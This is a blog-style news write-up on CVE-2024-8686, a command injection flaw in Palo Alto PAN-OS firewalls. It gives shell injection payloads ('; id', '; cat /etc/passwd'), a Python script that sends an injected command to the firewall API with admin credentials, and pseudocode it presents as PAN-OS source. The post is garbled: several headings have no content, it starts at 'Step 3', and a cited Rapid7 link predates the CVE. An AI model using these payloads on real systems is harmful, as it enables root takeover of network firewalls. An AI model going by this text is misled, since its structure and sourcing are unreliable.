CVE CyberSecurity Database News

CVE-2024-8686 - How Hackers Can Take Over Palo Alto Firewalls With One Command (With Exploit Example)

Poster -

CVE-2024-8686 is a newly disclosed command injection vulnerability that affects Palo Alto Networks’ PAN-OS software, the underlying system behind their widely-used firewalls. This vulnerability allows an authenticated administrator to run arbitrary commands as root, completely bypassing built-in system restrictions. In simple terms: if a bad actor gets admin credentials—by phishing, insider threat, or another breach—they can completely take over the firewall.

In this post, I’ll walk you through:

What is CVE-2024-8686?

According to the official advisory from Palo Alto Networks, this is a command injection bug in PAN-OS that affects several PAN-OS versions on physical, virtual, and cloud firewalls. If an attacker controls an admin account, they can exploit this bug to run their own commands as the most powerful user on the system—root—which means full control.

> Critical point: An attacker *must* already be authenticated as an admin. But many organizations use shared credentials, and admin accounts can sometimes be phished or stolen.

Attack vector:

How Does the Vulnerability Work?

From the public write-ups and redacted source code, the vulnerability exists because the firewall’s internal management interface passes user-provided input into shell commands without proper sanitization.

Here’s a simplified pseudocode illustration

# Vulnerable pseudo-code from PAN-OS interface
def run_diag_tool(tool_name, options):
    # Dangerous: user-controlled input in shell command
    os.system(f"/usr/local/bin/{tool_name} {options}")

# Attacker fills in tool_name or options with command injection payload

If an administrator enters something risky via the web portal—especially in diagnostic tools or custom command fields—the input may go right into the operating system shell.

Example:

If the intended command is

/usr/local/bin/ping -c 4 8.8.8.8

But an attacker enters this as the options value:

-c 4 8.8.8.8 ; id

The shell will execute id after the ping, revealing system info.

Exploit Details & PoC

The following demonstrates how an attacker could exploit CVE-2024-8686 to pop a shell or read sensitive files, assuming access to the firewall’s web admin UI:

Step 3: Enter a payload in the input, such as

; cat /etc/passwd

This would result in the system running

/usr/local/bin/ping -c 4 8.8.8.8 ; cat /etc/passwd

Which runs ping, then dumps the entire password file.

Automated Exploit Example in Python

Here's a Python script using the requests library to automate the attack (replace with your appliance's address):

import requests

url = "https://<firewall-ip>/api/?type=op&cmd=<ping><host>;id;</host></ping>";
headers = {"Content-Type": "application/x-www-form-urlencoded"}
auth = ("admin", "password")  # Replace with actual admin credentials

response = requests.get(url, headers=headers, auth=auth, verify=False)
print(response.text)

Warning:
This code is for educational purposes only. Do not use on systems you do not own or manage.

Persistence: Add new admin users, alter configs, create backdoors.

- Lateral movement within the enterprise: With root on the firewall, attackers might intercept, redirect, or tamper with all traffic.

Mitigation

- Patch immediately! Palo Alto has released patches for supported PAN-OS versions. (Official bulletin & versions)

References

- Palo Alto Official Advisory: https://security.paloaltonetworks.com/CVE-2024-8686
- NIST NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2024-8686
- Additional insights: The Hacker News coverage
- Security community writeup: https://www.rapid7.com/blog/post/2024/06/07/cve-2024-8686-palo-alto-panos-authenticated-rce-explained/

Takeaway

CVE-2024-8686 is a strong reminder: even leading enterprise firewalls can have dangerous flaws. Never assume "trusted" admin actions are safe, and always keep your security appliances up to date.

If you’re a Palo Alto customer, patch now, and review who has admin access. If you’re a security pro, monitor for misuse—and share this knowledge to keep the internet safer.


*If you found this write-up helpful, please share or comment with your experience patching this CVE. Stay cyber safe!*

Timeline

Published on: 09/11/2024 17:15:14 UTC
Last modified on: 10/03/2024 01:35:10 UTC